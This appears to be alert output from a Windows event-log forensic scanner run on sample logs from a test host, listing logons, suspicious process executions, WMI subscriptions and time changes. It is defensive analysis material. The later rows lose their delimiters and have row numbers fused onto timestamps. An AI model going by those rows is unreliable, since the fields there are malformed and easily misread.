2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4662013-10-24 07:05:40.928 +09:00IE8Win74624informationalLogon Type 4 - BatchUser: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4672013-10-24 07:05:40.928 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4682013-10-24 07:08:00.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4692013-10-24 07:08:00.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4702013-10-24 07:10:10.631 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4712013-10-24 08:11:15.779 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4722013-10-24 08:11:15.779 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4732013-10-24 08:11:15.779 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4742014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4752014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4762014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4772014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4782014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4792014-11-22 08:29:47.424 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4802014-11-22 08:29:47.424 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4812014-11-22 08:29:47.517 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4822014-11-22 08:30:12.392 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4832014-11-22 08:30:12.392 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4842014-11-22 08:32:12.657 +09:00IE8Win74634informationalLogoffUser: IEUser : LogonID: 0x144dfrules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4852014-11-22 08:34:00.063 +09:00IE8Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4862014-11-22 08:40:48.532 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0xd9c6rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4872014-11-22 08:42:11.390 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4882014-11-22 08:42:11.390 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4892014-11-22 08:42:34.625 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4902014-11-22 08:42:43.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
4912014-11-22 08:42:49.610 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4922014-11-22 08:42:49.610 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4932014-11-22 08:42:49.610 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4942014-11-22 08:43:06.625 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4952014-11-22 08:43:06.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4962014-11-22 08:43:06.625 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4972014-11-22 08:43:06.625 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x16559rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
4982014-11-22 08:44:23.818 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
4992014-11-22 08:44:23.818 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5002014-11-22 08:44:23.849 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5012014-11-22 08:45:01.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5022014-11-22 08:45:01.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5032014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5042014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5052014-11-22 08:45:09.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5062014-11-22 09:34:55.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5072014-11-22 09:37:57.755 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5082014-11-22 09:44:32.677 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x16589rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5092014-11-22 09:53:07.927 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5102014-11-22 10:07:45.896 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5112014-11-22 10:13:36.380 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5122014-11-22 10:21:57.052 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5132014-11-22 10:36:35.927 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5142014-11-22 10:38:16.943 +09:00IE8Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5152014-11-24 14:07:11.015 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5162014-11-24 14:07:11.015 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5172014-11-24 14:07:26.562 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5182014-11-24 14:07:38.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5192014-11-24 14:07:42.189 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5202014-11-24 14:07:42.189 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5212014-11-24 14:07:42.189 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
